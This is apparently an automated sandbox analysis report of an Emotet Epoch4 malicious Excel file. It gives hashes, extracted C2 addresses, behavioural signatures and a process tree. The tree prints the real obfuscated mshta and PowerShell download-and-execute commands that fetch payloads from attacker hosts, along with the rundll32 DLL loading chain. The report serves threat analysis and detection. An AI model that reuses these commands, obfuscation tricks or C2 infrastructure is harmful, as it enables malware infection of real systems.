emotet | 9529b48a5f5fd2aff17d966d10c20e9ab8912e234506de6de41b2758ed0f3f2f

General

Target

9529b48a5f5fd2aff17d966d10c20e9ab8912e234506de6de41b2758ed0f3f2f.xls
Size

128KB
MD5

d53904bac924c9d2dd304ca3fe736d74
SHA1

ec526f926bd2b3a51062139bc9730f80729d09f1
SHA256

9529b48a5f5fd2aff17d966d10c20e9ab8912e234506de6de41b2758ed0f3f2f
SHA512

80c737de3f932e64221067a49f2f1c2907fdcb1566304f68b1d2cf29abdd5b19ee87dca13d6832d7e00683126f147e457af974d815d9c3131112d5c363d4c988

Score

10^/10

emotet epoch4 banker suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://0xb907d607/cc.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.7/PP91.PNG

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2644	2472	cmd.exe	67

suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata

Blocklisted process makes network request 6 IoCs

Processes:

mshta.exepowershell.exerundll32.exe

flow	pid	Process
26	1856	mshta.exe
35	3864	powershell.exe
37	3864	powershell.exe
39	3864	powershell.exe
47	4032	rundll32.exe
48	4032	rundll32.exe

Downloads MZ/PE file

Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid	Process
1080	rundll32.exe
1396	rundll32.exe

Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Oqleddczjvxrjlai\hxtjh.qmi	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
2808	1856	WerFault.exe	74

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
2472	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

powershell.exeWerFault.exerundll32.exe

pid	Process
3864	powershell.exe
3864	powershell.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
2808	WerFault.exe
3864	powershell.exe
4032	rundll32.exe
4032	rundll32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeWerFault.exe

description	pid	Process
Token: SeDebugPrivilege	3864	powershell.exe
Token: SeDebugPrivilege	2808	WerFault.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

EXCEL.EXE

pid	Process
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE
2472	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

EXCEL.EXEcmd.exemshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exe

description	pid	Process	procid_target
PID 2472 wrote to memory of 2644	2472	EXCEL.EXE	71
PID 2472 wrote to memory of 2644	2472	EXCEL.EXE	71
PID 2644 wrote to memory of 1856	2644	cmd.exe	74
PID 2644 wrote to memory of 1856	2644	cmd.exe	74
PID 1856 wrote to memory of 3864	1856	mshta.exe	76
PID 1856 wrote to memory of 3864	1856	mshta.exe	76
PID 3864 wrote to memory of 3040	3864	powershell.exe	79
PID 3864 wrote to memory of 3040	3864	powershell.exe	79
PID 3040 wrote to memory of 1080	3040	cmd.exe	80
PID 3040 wrote to memory of 1080	3040	cmd.exe	80
PID 3040 wrote to memory of 1080	3040	cmd.exe	80
PID 1080 wrote to memory of 1396	1080	rundll32.exe	81
PID 1080 wrote to memory of 1396	1080	rundll32.exe	81
PID 1080 wrote to memory of 1396	1080	rundll32.exe	81
PID 1396 wrote to memory of 1308	1396	rundll32.exe	82
PID 1396 wrote to memory of 1308	1396	rundll32.exe	82
PID 1396 wrote to memory of 1308	1396	rundll32.exe	82
PID 1308 wrote to memory of 4032	1308	rundll32.exe	83
PID 1308 wrote to memory of 4032	1308	rundll32.exe	83
PID 1308 wrote to memory of 4032	1308	rundll32.exe	83

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\9529b48a5f5fd2aff17d966d10c20e9ab8912e234506de6de41b2758ed0f3f2f.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/c^c.h^tm^l
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\system32\mshta.exe
    mshta http://0xb907d607/cc.html
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:1856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3864
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3040
      - C:\Windows\SysWow64\rundll32.exe
        
        C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
        6⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1080
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
        7⤵
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:1396
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oqleddczjvxrjlai\hxtjh.qmi",trNEzrVq
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1308
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Oqleddczjvxrjlai\hxtjh.qmi",DllRegisterServer
        9⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:4032
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1856 -s 1668
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2808

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Documents\ssd.dll

MD5
e5fcf505c25e66116f288a8ae28d2c8a

SHA1
e597f6439a01aad82e153e0de647f54ad82b58d3

SHA256
63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9

SHA512
ba8e09ab2b234836b39e07e7f3c1a394c57674bcd4959873ca324af14b2bb31fcc26feaba47fd55bf0fe572345f71a72851fe3b3c92664b3195eb9c683909eb1

Download Submit
\Users\Public\Documents\ssd.dll

MD5
e5fcf505c25e66116f288a8ae28d2c8a

SHA1
e597f6439a01aad82e153e0de647f54ad82b58d3

SHA256
63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9

SHA512
ba8e09ab2b234836b39e07e7f3c1a394c57674bcd4959873ca324af14b2bb31fcc26feaba47fd55bf0fe572345f71a72851fe3b3c92664b3195eb9c683909eb1

Download Submit
\Users\Public\Documents\ssd.dll

MD5
e5fcf505c25e66116f288a8ae28d2c8a

SHA1
e597f6439a01aad82e153e0de647f54ad82b58d3

SHA256
63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9

SHA512
ba8e09ab2b234836b39e07e7f3c1a394c57674bcd4959873ca324af14b2bb31fcc26feaba47fd55bf0fe572345f71a72851fe3b3c92664b3195eb9c683909eb1

Download Submit
memory/1080-340-0x0000000004AA0000-0x0000000004AC6000-memory.dmp

Filesize
152KB

Download
memory/1308-356-0x0000000004870000-0x0000000004896000-memory.dmp

Filesize
152KB

Download
memory/1396-352-0x0000000005010000-0x0000000005036000-memory.dmp

Filesize
152KB

Download
memory/1396-343-0x0000000002E40000-0x0000000002E66000-memory.dmp

Filesize
152KB

Download
memory/1396-354-0x0000000005170000-0x0000000005196000-memory.dmp

Filesize
152KB

Download
memory/1396-350-0x0000000004FB0000-0x0000000004FD6000-memory.dmp

Filesize
152KB

Download
memory/1396-348-0x0000000004E40000-0x0000000004E66000-memory.dmp

Filesize
152KB

Download
memory/1396-345-0x0000000003120000-0x0000000003146000-memory.dmp

Filesize
152KB

Download
memory/2472-115-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-116-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-128-0x00007FFFAB270000-0x00007FFFAB280000-memory.dmp

Filesize
64KB

Download
memory/2472-121-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-118-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-117-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-412-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-411-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-410-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-409-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp

Filesize
64KB

Download
memory/2472-129-0x00007FFFAB270000-0x00007FFFAB280000-memory.dmp

Filesize
64KB

Download
memory/3864-283-0x000001D433E10000-0x000001D433E12000-memory.dmp

Filesize
8KB

Download
memory/3864-280-0x000001D41B870000-0x000001D41B892000-memory.dmp

Filesize
136KB

Download
memory/3864-317-0x000001D433E16000-0x000001D433E18000-memory.dmp

Filesize
8KB

Download
memory/3864-284-0x000001D433E13000-0x000001D433E15000-memory.dmp

Filesize
8KB

Download
memory/3864-301-0x000001D434320000-0x000001D43435C000-memory.dmp

Filesize
240KB

Download
memory/3864-312-0x000001D434530000-0x000001D4345A6000-memory.dmp

Filesize
472KB

Download
memory/4032-357-0x00000000043A0000-0x00000000043C6000-memory.dmp

Filesize
152KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads